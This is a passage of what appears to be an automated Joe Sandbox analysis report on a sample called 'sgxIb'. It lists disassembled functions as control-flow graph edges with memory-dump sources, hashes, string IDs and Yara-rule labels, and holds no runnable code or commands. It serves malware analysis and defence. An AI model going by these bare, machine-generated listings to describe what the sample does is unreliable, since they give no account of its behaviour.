68559b1-68559b4 2332->2341 2342 68559ac 2332->2342 2338 6855d33-6855d36 2334->2338 2339 6855d1b-6855d2c 2334->2339 2336->2277 2337 685598c-685598f 2336->2337 2337->2327 2347 6855d50-6855d53 2338->2347 2348 6855d38-6855d49 2338->2348 2353 6855d2e 2339->2353 2354 6855d7b-6855d82 2339->2354 2341->2267 2341->2292 2342->2341 2347->2322 2352 6855d59-6855d5c 2347->2352 2357 6855d5e-6855d6f 2348->2357 2360 6855d4b 2348->2360 2356 6855d76-6855d79 2352->2356 2352->2357 2353->2338 2358 6855d87-6855d8a 2354->2358 2356->2354 2356->2358 2357->2354 2363 6855d71 2357->2363 2358->2322 2361 6855d90-6855d93 2358->2361 2360->2347 2364 6855d95-6855da6 2361->2364 2365 6855db1-6855db4 2361->2365 2363->2356 2364->2335 2375 6855dac 2364->2375 2367 6855db6-6855dc7 2365->2367 2368 6855dce-6855dd1 2365->2368 2367->2354 2378 6855dc9 2367->2378 2371 6855dd3-6855dd8 2368->2371 2372 6855ddb-6855ddd 2368->2372 2371->2372 2373 6855de4-6855de7 2372->2373 2374 6855ddf 2372->2374 2373->2319 2377 6855ded-6855df6 2373->2377 2374->2373 2375->2365 2378->2368 2398 6855c6d-6855c74 2397->2398 2399 6855bbf-6855be2 2397->2399 2398->2396 2400 6855c76-6855ca9 2398->2400 2408 6855bea-6855bf2 2399->2408 2412 6855cae-6855cdb 2400->2412 2413 6855cab 2400->2413 2410 6855bf4 2408->2410 2411 6855bf7-6855c38 2408->2411 2410->2411 2421 6855c50-6855c61 2411->2421 2422 6855c3a-6855c4b 2411->2422 2412->2377 2413->2412 2421->2377 2422->2377
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $
                                                                                                            • API String ID: 0-3993045852
                                                                                                            • Opcode ID: c022c21ec7e9116bb875dad2115bd82701ba625d8314f68a49eb31081459c344
                                                                                                            • Instruction ID: 92663d493f03d08c39ee061c7278c446881475572097dce67f81aada692880d9
                                                                                                            • Opcode Fuzzy Hash: c022c21ec7e9116bb875dad2115bd82701ba625d8314f68a49eb31081459c344
                                                                                                            • Instruction Fuzzy Hash: CA22EF71E002058FDF64DBA4C4946AEBBF2EF85320F218469D94AEB354DA35DD42CB92
                                                                                                            Function 06856708 Relevance: .8, Instructions: 812COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8851cf1ed1a93478b9477d8386bce96c671cda6929ca28f66f50365561bf3f1c
                                                                                                            • Instruction ID: fc1709cdb83631b68eaf885eaafa7caa7cdd16401b5ddf23296c39cd7f28aae8
                                                                                                            • Opcode Fuzzy Hash: 8851cf1ed1a93478b9477d8386bce96c671cda6929ca28f66f50365561bf3f1c
                                                                                                            • Instruction Fuzzy Hash: 1B62AF34B002048FDB54DB68D594AADB7F2FF85314F558469E90AEB360EB35ED82CB81
                                                                                                            Function 0685ADE8 Relevance: 12.9, Strings: 10, Instructions: 390COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 685ade8-685ae06 1 685ae08-685ae0b 0->1 2 685ae0d-685ae29 1->2 3 685ae2e-685ae31 1->3 2->3 4 685b005-685b00e 3->4 5 685ae37-685ae3a 3->5 9 685b014-685b01e 4->9 10 685ae91-685ae9a 4->10 7 685ae3c-685ae49 5->7 8 685ae4e-685ae51 5->8 7->8 13 685ae53-685ae57 8->13 14 685ae62-685ae65 8->14 11 685aea0-685aea4 10->11 12 685b01f-685b056 10->12 16 685aea9-685aeac 11->16 28 685b058-685b05b 12->28 13->9 18 685ae5d 13->18 19 685ae67-685ae6c 14->19 20 685ae6f-685ae72 14->20 21 685aebc-685aebe 16->21 22 685aeae-685aeb7 16->22 18->14 19->20 24 685ae74-685ae87 20->24 25 685ae8c-685ae8f 20->25 26 685aec5-685aec8 21->26 27 685aec0 21->27 22->21 24->25 25->10 25->16 26->1 32 685aece-685aef2 26->32 27->26 30 685b05d-685b079 28->30 31 685b07e-685b081 28->31 30->31 33 685b090-685b093 31->33 34 685b083 call 685b3e7 31->34 50 685b002 32->50 51 685aef8-685af07 32->51 36 685b095-685b099 33->36 37 685b0a0-685b0a3 33->37 39 685b089-685b08b 34->39 40 685b0a9-685b0e4 36->40 41 685b09b 36->41 37->40 42 685b30c-685b30f 37->42 39->33 52 685b2d7-685b2ea 40->52 53 685b0ea-685b0f6 40->53 41->37 44 685b311-685b31b 42->44 45 685b31c-685b31e 42->45 48 685b325-685b328 45->48 49 685b320 45->49 48->28 54 685b32e-685b338 48->54 49->48 50->4 57 685af1f-685af5a call 68566b8 51->57 58 685af09-685af0f 51->58 56 685b2ec 52->56 60 685b116-685b15a 53->60 61 685b0f8-685b111 53->61 64 685b2ed 56->64 76 685af72-685af89 57->76 77 685af5c-685af62 57->77 62 685af11 58->62 63 685af13-685af15 58->63 78 685b176-685b1b5 60->78 79 685b15c-685b16e 60->79 61->56 62->57 63->57 64->64 89 685afa1-685afb2 76->89 90 685af8b-685af91 76->90 80 685af64 77->80 81 685af66-685af68 77->81 86 685b29c-685b2b1 78->86 87 685b1bb-685b296 call 68566b8 78->87 79->78 80->76 81->76 86->52 87->86 98 685afb4-685afba 89->98 99 685afca-685affb 89->99 92 685af95-685af97 90->92 93 685af93 90->93 92->89 93->89 100 685afbc 98->100 101 685afbe-685afc0 98->101 99->50 100->99 101->99
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: XM$XM$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2488550430
                                                                                                            • Opcode ID: dc057f56aa6dfcf7f2d0f901718b6e13a410e3a7b3a942c23fda1405424735d5
                                                                                                            • Instruction ID: 47ed01013398d02467588a92e2d98cb9cabf233c4320653bef7d296985de720c
                                                                                                            • Opcode Fuzzy Hash: dc057f56aa6dfcf7f2d0f901718b6e13a410e3a7b3a942c23fda1405424735d5
                                                                                                            • Instruction Fuzzy Hash: D0E18E30E102198FCB68DF68D4946AEB7F2FF89305F118529E909EB354DB709C868B91
                                                                                                            Function 06859268 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 256 6859268-685928d 257 685928f-6859292 256->257 258 6859294-68592b3 257->258 259 68592b8-68592bb 257->259 258->259 260 68592c1-68592d6 259->260 261 6859b7b-6859b7d 259->261 268 68592ee-6859304 260->268 269 68592d8-68592de 260->269 263 6859b84-6859b87 261->263 264 6859b7f 261->264 263->257 266 6859b8d-6859b97 263->266 264->263 273 685930f-6859311 268->273 270 68592e0 269->270 271 68592e2-68592e4 269->271 270->268 271->268 274 6859313-6859319 273->274 275 6859329-685939a 273->275 276 685931d-685931f 274->276 277 685931b 274->277 286 68593c6-68593e2 275->286 287 685939c-68593bf 275->287 276->275 277->275 292 68593e4-6859407 286->292 293 685940e-6859429 286->293 287->286 292->293 298 6859454-685946f 293->298 299 685942b-685944d 293->299 304 6859471-6859493 298->304 305 685949a-68594a4 298->305 299->298 304->305 306 68594b4-685952e 305->306 307 68594a6-68594af 305->307 313 6859530-685954e 306->313 314 685957b-6859590 306->314 307->266 318 6859550-685955f 313->318 319 685956a-6859579 313->319 314->261 318->319 319->313 319->314
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q$$^q
                                                                                                            • API String ID: 0-2125118731
                                                                                                            • Opcode ID: b97777b032b4bd25a8009df1307be14599f3062b7838da79d206bde59f366a71
                                                                                                            • Instruction ID: 5368c3d1740a4130b39b5b61a81abc135defbbdec09ebdd3b92fe797921a48ab
                                                                                                            • Opcode Fuzzy Hash: b97777b032b4bd25a8009df1307be14599f3062b7838da79d206bde59f366a71
                                                                                                            • Instruction Fuzzy Hash: AF914E30B1021ADFDF54EB65D8507AEB3F6AFC9204F108569D90EEB344EA709D468B91
                                                                                                            Function 0685D070 Relevance: 4.5, Strings: 3, Instructions: 797COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 322 685d070-685d08b 323 685d08d-685d090 322->323 324 685d092-685d0a1 323->324 325 685d0d9-685d0dc 323->325 328 685d0b0-685d0bc 324->328 329 685d0a3-685d0a8 324->329 326 685d125-685d128 325->326 327 685d0de-685d120 325->327 330 685d137-685d13a 326->330 331 685d12a-685d12c 326->331 327->326 332 685d0c2-685d0d4 328->332 333 685da8d-685dac6 328->333 329->328 336 685d144-685d147 330->336 337 685d13c-685d141 330->337 334 685d132 331->334 335 685d559 331->335 332->325 344 685dac8-685dacb 333->344 334->330 343 685d55c-685d568 335->343 341 685d190-685d193 336->341 342 685d149-685d18b 336->342 337->336 345 685d195-685d1d7 341->345 346 685d1dc-685d1df 341->346 342->341 343->324 348 685d56e-685d85b 343->348 349 685dacd-685dae9 344->349 350 685daee-685daf1 344->350 345->346 352 685d1e1-685d223 346->352 353 685d228-685d22b 346->353 535 685d861-685d867 348->535 536 685da82-685da8c 348->536 349->350 356 685db24-685db27 350->356 357 685daf3-685db1f 350->357 352->353 358 685d274-685d277 353->358 359 685d22d-685d26f 353->359 366 685db36-685db38 356->366 367 685db29 call 685dbe5 356->367 357->356 363 685d2c0-685d2c3 358->363 364 685d279-685d288 358->364 359->358 374 685d2c5-685d2c7 363->374 375 685d2d2-685d2d5 363->375 370 685d297-685d2a3 364->370 371 685d28a-685d28f 364->371 376 685db3f-685db42 366->376 377 685db3a 366->377 385 685db2f-685db31 367->385 370->333 384 685d2a9-685d2bb 370->384 371->370 386 685d417-685d420 374->386 387 685d2cd 374->387 378 685d2d7-685d2ed 375->378 379 685d2f2-685d2f5 375->379 376->344 380 685db44-685db53 376->380 377->376 378->379 389 685d2f7-685d339 379->389 390 685d33e-685d341 379->390 405 685db55-685dbb8 call 68566b8 380->405 406 685dbba-685dbcf 380->406 384->363 385->366 392 685d422-685d427 386->392 393 685d42f-685d43b 386->393 387->375 389->390 400 685d364-685d367 390->400 401 685d343-685d35f 390->401 392->393 402 685d441-685d455 393->402 403 685d54c-685d551 393->403 400->343 410 685d36d-685d370 400->410 401->400 402->335 427 685d45b-685d46d 402->427 403->335 405->406 434 685dbd0 406->434 418 685d372-685d3b4 410->418 419 685d3b9-685d3bc 410->419 418->419 422 685d405-685d407 419->422 423 685d3be-685d400 419->423 431 685d40e-685d411 422->431 432 685d409 422->432 423->422 443 685d491-685d493 427->443 444 685d46f-685d475 427->444 431->323 431->386 432->431 434->434 449 685d49d-685d4a9 443->449 450 685d477 444->450 451 685d479-685d485 444->451 462 685d4b7 449->462 463 685d4ab-685d4b5 449->463 453 685d487-685d48f 450->453 451->453 453->449 464 685d4bc-685d4be 462->464 463->464 464->335 469 685d4c4-685d4e0 call 68566b8 464->469 478 685d4e2-685d4e7 469->478 479 685d4ef-685d4fb 469->479 478->479 479->403 482 685d4fd-685d54a 479->482 482->335 537 685d876-685d87f 535->537 538 685d869-685d86e 535->538 537->333 539 685d885-685d898 537->539 538->537 541 685da72-685da7c 539->541 542 685d89e-685d8a4 539->542 541->535 541->536 543 685d8a6-685d8ab 542->543 544 685d8b3-685d8bc 542->544 543->544 544->333 545 685d8c2-685d8e3 544->545 548 685d8e5-685d8ea 545->548 549 685d8f2-685d8fb 545->549 548->549 549->333 550 685d901-685d91e 549->550 550->541 553 685d924-685d92a 550->553 553->333 554 685d930-685d949 553->554 556 685da65-685da6c 554->556 557 685d94f-685d976 554->557 556->541 556->553 557->333 560 685d97c-685d986 557->560 560->333 561 685d98c-685d9a3 560->561 563 685d9a5-685d9b0 561->563 564 685d9b2-685d9cd 561->564 563->564 564->556 569 685d9d3-685d9ec call 68566b8 564->569 573 685d9ee-685d9f3 569->573 574 685d9fb-685da04 569->574 573->574 574->333 575 685da0a-685da5e 574->575 575->556
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q$$^q
                                                                                                            • API String ID: 0-831282457
                                                                                                            • Opcode ID: 522950c536d6cd91d7fbe73c7c6d9f250d876b246448ed06462f1c6f77c689e9
                                                                                                            • Instruction ID: f34603c02f71e65427c3540bc796aed09a9c3dcbeac3186aa7279622949dded2
                                                                                                            • Opcode Fuzzy Hash: 522950c536d6cd91d7fbe73c7c6d9f250d876b246448ed06462f1c6f77c689e9
                                                                                                            • Instruction Fuzzy Hash: 9F625D30A003158FCB55EB68D580A5EB7F2FF84305B218A69D809DF759EB71ED86CB84
                                                                                                            Function 06F32148 Relevance: 4.1, Strings: 3, Instructions: 351COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 583 6f32148-6f3216d 584 6f32173-6f32175 583->584 585 6f322c2-6f322e6 583->585 586 6f3217b-6f32184 584->586 587 6f322ed-6f32372 584->587 585->587 589 6f32197-6f321be 586->589 590 6f32186-6f32194 586->590 620 6f32433 587->620 621 6f32378-6f3238b 587->621 592 6f321c4-6f321d7 call 6f31e34 589->592 593 6f32248-6f3224c 589->593 590->589 592->593 609 6f321d9-6f3222c 592->609 596 6f32283-6f3229c 593->596 597 6f3224e-6f3227b call 6f31e44 593->597 603 6f322a6 596->603 604 6f3229e 596->604 612 6f32280 597->612 603->585 604->603 609->593 615 6f3222e-6f32241 609->615 612->596 615->593 623 6f32438-6f32443 620->623 621->620 626 6f32391-6f3239d 621->626 627 6f3244a-6f32473 623->627 626->623 629 6f323a3-6f323ce 626->629 631 6f32475-6f3247e 627->631 632 6f3247f-6f32554 627->632 629->620 640 6f323d0-6f323dc 629->640 653 6f3255a-6f32568 632->653 641 6f32428-6f32432 640->641 642 6f323de-6f323e1 640->642 643 6f323e4-6f323ed 642->643 643->627 645 6f323ef-6f3240a 643->645 647 6f32412-6f32415 645->647 648 6f3240c-6f3240e 645->648 647->620 649 6f32417-6f32426 647->649 648->620 650 6f32410 648->650 649->641 649->643 650->649 654 6f32571-6f325a9 653->654 655 6f3256a-6f32570 653->655 659 6f325ab-6f325af 654->659 660 6f325b9 654->660 655->654 659->660 661 6f325b1 659->661 662 6f325ba 660->662 661->660 662->662
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4144663887.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6f30000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: (bq$(bq$(bq
                                                                                                            • API String ID: 0-2716923250
                                                                                                            • Opcode ID: fca4d22cf7ef09ea5138c9481557c07ffd52a119832a74475b1dfac0e290e7d7
                                                                                                            • Instruction ID: ec46795233583d0dec06e7b5d06844d0340a31e1c7bbfdb4b1418083f08d1898
                                                                                                            • Opcode Fuzzy Hash: fca4d22cf7ef09ea5138c9481557c07ffd52a119832a74475b1dfac0e290e7d7
                                                                                                            • Instruction Fuzzy Hash: 08D1AE70E003198FCB54DFA9C8546AEBBF2FF89310F148569E405AB391DB34AE41CBA1
                                                                                                            Function 06854C80 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 663 6854c80-6854ca4 664 6854ca6-6854ca9 663->664 665 6854cab-6854cc5 664->665 666 6854cca-6854ccd 664->666 665->666 667 6854cd3-6854dcb 666->667 668 68553ac-68553ae 666->668 686 6854dd1-6854e1e call 685552b 667->686 687 6854e4e-6854e55 667->687 670 68553b5-68553b8 668->670 671 68553b0 668->671 670->664 672 68553be-68553cb 670->672 671->670 700 6854e24-6854e40 686->700 688 6854ed9-6854ee2 687->688 689 6854e5b-6854ecb 687->689 688->672 706 6854ed6 689->706 707 6854ecd 689->707 703 6854e42 700->703 704 6854e4b 700->704 703->704 704->687 706->688 707->706
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq$\Ocq
                                                                                                            • API String ID: 0-3575482020
                                                                                                            • Opcode ID: d9a64970680c7b74f0d3a253e04a322d50ab8ee0e483e6aec4cedd36ca7de4a8
                                                                                                            • Instruction ID: d4c672f1eb5cda7617eb33b5ecee23e2a6d79e8016af4bc7279f577bb8059d94
                                                                                                            • Opcode Fuzzy Hash: d9a64970680c7b74f0d3a253e04a322d50ab8ee0e483e6aec4cedd36ca7de4a8
                                                                                                            • Instruction Fuzzy Hash: A1616031E002089FDB549FB9C8547AEBBF6FB88710F208429E50AEB391DF758D458B91
                                                                                                            Function 0685925B Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1457 685925b-685928d 1459 685928f-6859292 1457->1459 1460 6859294-68592b3 1459->1460 1461 68592b8-68592bb 1459->1461 1460->1461 1462 68592c1-68592d6 1461->1462 1463 6859b7b-6859b7d 1461->1463 1470 68592ee-6859304 1462->1470 1471 68592d8-68592de 1462->1471 1465 6859b84-6859b87 1463->1465 1466 6859b7f 1463->1466 1465->1459 1468 6859b8d-6859b97 1465->1468 1466->1465 1475 685930f-6859311 1470->1475 1472 68592e0 1471->1472 1473 68592e2-68592e4 1471->1473 1472->1470 1473->1470 1476 6859313-6859319 1475->1476 1477 6859329-685939a 1475->1477 1478 685931d-685931f 1476->1478 1479 685931b 1476->1479 1488 68593c6-68593e2 1477->1488 1489 685939c-68593bf 1477->1489 1478->1477 1479->1477 1494 68593e4-6859407 1488->1494 1495 685940e-6859429 1488->1495 1489->1488 1494->1495 1500 6859454-685946f 1495->1500 1501 685942b-685944d 1495->1501 1506 6859471-6859493 1500->1506 1507 685949a-68594a4 1500->1507 1501->1500 1506->1507 1508 68594b4-685952e 1507->1508 1509 68594a6-68594af 1507->1509 1515 6859530-685954e 1508->1515 1516 685957b-6859590 1508->1516 1509->1468 1520 6859550-685955f 1515->1520 1521 685956a-6859579 1515->1521 1516->1463 1520->1521 1521->1515 1521->1516
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $^q$$^q
                                                                                                            • API String ID: 0-355816377
                                                                                                            • Opcode ID: 69333ab6133bc0d042c94a61b32a04de19d36ac441ec5db2ec99cdf60eb97846
                                                                                                            • Instruction ID: fdf497160ca4ab8fbb7aa8fcd4d1263f145e4de4925ecb2d511832fcf35a7884
                                                                                                            • Opcode Fuzzy Hash: 69333ab6133bc0d042c94a61b32a04de19d36ac441ec5db2ec99cdf60eb97846
                                                                                                            • Instruction Fuzzy Hash: 7B512030B10215DFDF54EB68D9907AE73F6ABC9244F108569D90AEB398EA30DC42CB95
                                                                                                            Function 06854C71 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1524 6854c71-6854ca4 1526 6854ca6-6854ca9 1524->1526 1527 6854cab-6854cc5 1526->1527 1528 6854cca-6854ccd 1526->1528 1527->1528 1529 6854cd3-6854dcb 1528->1529 1530 68553ac-68553ae 1528->1530 1548 6854dd1-6854e1e call 685552b 1529->1548 1549 6854e4e-6854e55 1529->1549 1532 68553b5-68553b8 1530->1532 1533 68553b0 1530->1533 1532->1526 1534 68553be-68553cb 1532->1534 1533->1532 1562 6854e24-6854e40 1548->1562 1550 6854ed9-6854ee2 1549->1550 1551 6854e5b-6854ecb 1549->1551 1550->1534 1568 6854ed6 1551->1568 1569 6854ecd 1551->1569 1565 6854e42 1562->1565 1566 6854e4b 1562->1566 1565->1566 1566->1549 1568->1550 1569->1568
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: fcq$XPcq
                                                                                                            • API String ID: 0-936005338
                                                                                                            • Opcode ID: 7214d46225b926e98705ff1831b8c38ae12f6524da9d5c7a6cecd0296c836d36
                                                                                                            • Instruction ID: 7fb138776a1a543b6ca76241481266973487852797dd3972a57d70e85156ec1c
                                                                                                            • Opcode Fuzzy Hash: 7214d46225b926e98705ff1831b8c38ae12f6524da9d5c7a6cecd0296c836d36
                                                                                                            • Instruction Fuzzy Hash: 76518071B002089FDB059FB9C8547AEBBF6EF88700F208429E505EB395DA758D418B91
                                                                                                            Function 00FEED70 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2425 feed70-feed8b 2426 feed8d-feedb4 2425->2426 2427 feedb5-feedcb 2425->2427 2449 feedcd call feee58 2427->2449 2450 feedcd call feed70 2427->2450 2430 feedd2-feedd4 2431 feedda-feee0f 2430->2431 2432 feedd6-feedd9 2430->2432 2437 feee10-feee39 2431->2437 2440 feee3f-feee54 2437->2440 2441 feee3b-feee3e 2437->2441 2440->2437 2443 feee56-feeecc GlobalMemoryStatusEx 2440->2443 2445 feeece-feeed4 2443->2445 2446 feeed5-feeefd 2443->2446 2445->2446 2449->2430 2450->2430
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4121172085.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_fe0000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4b9a9758ee7a002a76db98fa4efdeb9b40086ecd6b665e53d78fcced421a2c1a
                                                                                                            • Instruction ID: 01b2a2e6b993470adbcc75a3033d3758f6db45c73dcad4d5f311bc941357987d
                                                                                                            • Opcode Fuzzy Hash: 4b9a9758ee7a002a76db98fa4efdeb9b40086ecd6b665e53d78fcced421a2c1a
                                                                                                            • Instruction Fuzzy Hash: DE411372D043858FCB15DFB9D8102AABFF1AF8A310F1685ABD444E7282DB749885CBD1
                                                                                                            Function 00FEEE58 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2451 feee58-feeecc GlobalMemoryStatusEx 2453 feeece-feeed4 2451->2453 2454 feeed5-feeefd 2451->2454 2453->2454
                                                                                                            APIs
                                                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00FEEEBF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4121172085.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_fe0000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: GlobalMemoryStatus
                                                                                                            • String ID:
                                                                                                            • API String ID: 1890195054-0
                                                                                                            • Opcode ID: 614a537183da5b225506d7037a8cbeba518d1491cd35f6ca5d9ed3c912ba4f50
                                                                                                            • Instruction ID: 3821cf47c66ace412a34907b076c28a65da83be3a56a88aaa323cd2ecc24a318
                                                                                                            • Opcode Fuzzy Hash: 614a537183da5b225506d7037a8cbeba518d1491cd35f6ca5d9ed3c912ba4f50
                                                                                                            • Instruction Fuzzy Hash: 5711F3B1C006599BCB10DF9AD444BDEFBF4EF48320F15816AD818B7241D778A944CFA5
                                                                                                            Function 0685DBE5 Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 2516 685dbe5-685dbe8 2517 685dbf8-685dc0f 2516->2517 2518 685dbea-685dbf6 2516->2518 2519 685dc11-685dc14 2517->2519 2518->2517 2520 685dc16 2519->2520 2521 685dc23-685dc26 2519->2521 2524 685dc1c-685dc1e 2520->2524 2522 685dc59-685dc5c 2521->2522 2523 685dc28-685dc54 2521->2523 2525 685dc7f-685dc81 2522->2525 2526 685dc5e-685dc7a 2522->2526 2523->2522 2524->2521 2527 685dc83 2525->2527 2528 685dc88-685dc8b 2525->2528 2526->2525 2527->2528 2528->2519 2530 685dc8d-685dc9c 2528->2530 2533 685de21-685de4b 2530->2533 2534 685dca2-685dcdb 2530->2534 2537 685de4c 2533->2537 2541 685dcdd-685dce7 2534->2541 2542 685dd29-685dd4d 2534->2542 2537->2537 2546 685dcff-685dd27 2541->2546 2547 685dce9-685dcef 2541->2547 2548 685dd57-685de1b 2542->2548 2549 685dd4f 2542->2549 2546->2541 2546->2542 2550 685dcf1 2547->2550 2551 685dcf3-685dcf5 2547->2551 2548->2533 2548->2534 2549->2548 2550->2546 2551->2546
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: 09853e7299028fb64e298ff1fc75fd569590ca46fcebff9dbcb78a773e37d33b
                                                                                                            • Instruction ID: db800a8c78bb9b39836b2c9b540cc0a68ee699dcd1d3a357575835aacc61f906
                                                                                                            • Opcode Fuzzy Hash: 09853e7299028fb64e298ff1fc75fd569590ca46fcebff9dbcb78a773e37d33b
                                                                                                            • Instruction Fuzzy Hash: 0E418170E0034ADFDB65DF65C89479EBBB2AF85300F11492ADC05EB340DBB49946CB45
                                                                                                            Function 068521BD Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.4143406631.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_6850000_sgxIb.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: PH^q
                                                                                                            • API String ID: 0-2549759414
                                                                                                            • Opcode ID: d052b616e01dba47493c8eed0cc443a235fdaafdf3265017245a761930294876
                                                                                                            • Instruction ID: 6181a5a5a34cd271968e2f3e19f2b817d4693fd38b078c6e744603f27252248c
                                                                                                            • Opcode Fuzzy Hash: d052b616e01dba47493c8eed0cc443a235fdaafdf3265017245a761930294876
                                                                                                            • Instruction Fuzzy Hash: B0310130B102058FDB599B74C8646AEBBE2AF89310F114869D806EB391DF35CE46CBA1
                                                                                                            Function 068521D0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
